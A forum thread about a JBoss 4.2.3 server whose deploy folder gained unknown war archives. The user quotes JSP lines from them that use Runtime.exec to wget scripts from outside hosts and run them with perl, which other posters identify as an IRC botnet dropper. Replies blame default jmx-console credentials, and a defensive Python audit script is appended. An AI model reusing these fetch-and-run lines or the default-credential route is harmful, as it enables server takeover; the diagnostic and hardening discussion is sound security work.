Richard Lin wrote:
Recently I found some random war folders were created in my JBoss 4.2.3 deploy folder, like the attached snapshot.
That's part of the deploy folder? Or is it in the tmp folder?
Have you seen this http://community.jboss.org/wiki/securejboss? If you are making the server accessible to the outside world (by using -b 0.0.0.0) then it's necessary that you make sure you are keeping it secure.
I guess your JBoss installation is compromised. You need to lock it up.
ICE-unix is a file used for X Window session info, but in this case it's probably used as a backdoor for pasting in new scripts etc.
Do you have any file upload stuff in your applications that might have leaked (../../../) ?
In the deploy folder, not tmp.
I use Eclipse 3.3.2.
I only deploy to localhost JBoss 4.2.3.
I do have upload stuff, but never into JBoss folder.
Some JSPs have this:
Process process = Runtime.getRuntime().exec( "perl .ICE-unix" );
Process process = Runtime.getRuntime().exec( "wget some.other.url/data/.ICE-unix" );
Process process = Runtime.getRuntime().exec( "perl .X-un1x" );
Process process = Runtime.getRuntime().exec( "wget even.more.urls/xel/.X-un1x" );
What is the content of the .ICE-unix and .X-un1x files?
Those IP addresses are foreign to me.
Not our local IP address at all....
So I have no clue what is in it.
If I already have it on my PC, then I may already be in serious trouble, I think.
It is a virus! Do not download the link. It appears to be some IRC botnet called 'isasi-hack'.
For security reasons I've asked for the removal of all URLs linking back to the virus. Sorry for the inconvenience.
Hi, the same thing happened to me a few hours ago.
I'm using JBoss 4.2.3 on Ubuntu Linux 10.10 and suddenly I noticed some strange .war files in my deploy dir, with the same files as the first poster.
I have the same problem, but does anyone have an idea how they deployed these war archives?
I found nothing in the access log or in other log files.
Maybe they are using the admin-console or the jmx-console with the default user/password (admin). Using these applications, anybody can install a web application over web protocols.
If you didn't change it, you can change the information about the default user and password in some property files.
For the default server...
You can get additional instructions at http://community.jboss.org/wiki/SecureJBoss
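A defender-side check for the two things raised in this thread, default console accounts left enabled and unexpected deployments containing JSPs that shell out, as an added example that is not from the original thread or from the JBoss project. It assumes the JBoss 4.2 server-profile layout (server/<profile>/conf/props/*-users.properties and server/<profile>/deploy); the sample tree, the x9k2.war name and the allowlist are constructed for the example.

```python
import os, re, tempfile

# Constructed sample profile: paths follow the real JBoss 4.2 layout
# (server/<profile>/conf/props and server/<profile>/deploy); contents are made up.
SAMPLE_FILES = {
    "conf/props/jmx-console-users.properties": "# users\nadmin=admin\n",
    "deploy/myapp.war/index.jsp": "<html>hello</html>",
    "deploy/x9k2.war/cmd.jsp": '<% Runtime.getRuntime().exec("perl .ICE-unix"); %>',
}
EXEC_RE = re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(")  # JSP that shells out
DEFAULT_CREDS = {("admin", "admin")}

def check_default_credentials(profile):
    # Report uncommented default accounts in the jmx/web console user files.
    findings = []
    for name in ("jmx-console-users.properties", "web-console-users.properties"):
        path = os.path.join(profile, "conf", "props", name)
        for line in open(path) if os.path.isfile(path) else []:
            line = line.strip()
            if line and not line.startswith("#") and "=" in line:
                user, pw = (s.strip() for s in line.split("=", 1))
                if (user, pw) in DEFAULT_CREDS:
                    findings.append(f"{name}: default account '{user}' is enabled")
    return findings

def check_deploy_dir(profile, expected):
    # Flag .war entries outside the allowlist, then JSPs in exploded wars that spawn processes.
    deploy = os.path.join(profile, "deploy")
    findings = [f"unexpected deployment: {e}" for e in sorted(os.listdir(deploy))
                if e.endswith(".war") and e not in expected]
    for dirpath, _, files in os.walk(deploy):
        for f in sorted(files):
            full = os.path.join(dirpath, f)
            if f.endswith(".jsp") and EXEC_RE.search(open(full, errors="replace").read()):
                rel = os.path.relpath(full, deploy).replace(os.sep, "/")
                findings.append(f"JSP spawns a process: {rel}")
    return findings

def audit(profile, expected=("myapp.war",)):
    return check_default_credentials(profile) + check_deploy_dir(profile, expected)

def run_sample():
    # Write the constructed profile into a temp dir and audit it.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").write(body)
        return audit(tmp)
```

run_sample() returns the findings for the constructed tree; against a real server, call audit() with the profile directory and an allowlist of the wars you actually deploy (packed .war archives are listed but only exploded wars are scanned for JSPs).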
Thanks for your reply.
I guess this describes how the server gets infected.
all the best,